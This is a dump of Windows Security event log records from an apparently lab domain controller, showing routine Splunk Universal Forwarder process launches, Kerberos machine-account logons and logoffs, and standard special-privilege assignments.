SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:29:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263822
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1660
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:29:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263824
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a88
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:29:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263823
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b78
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:29:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263825
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:29:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263826
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:29:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263828
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x408
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:29:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263827
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa60
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:29:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263829
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766C62
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:29:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263832
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x76A521
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:29:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263831
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x76A521
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51566
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:29:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263830
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x76A521
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:30:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263833
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x754
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:30:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263835
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x53c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:30:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263834
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x4c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:30:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263836
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x154c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:30:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263837
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1200
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:30:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263839
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1abc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:30:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263838
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1284
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:30:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263842
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x76DF6D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:30:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263841
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x76DF6D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51579
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:30:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263840
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x76DF6D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:31:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263843
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bd0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:31:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263845
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
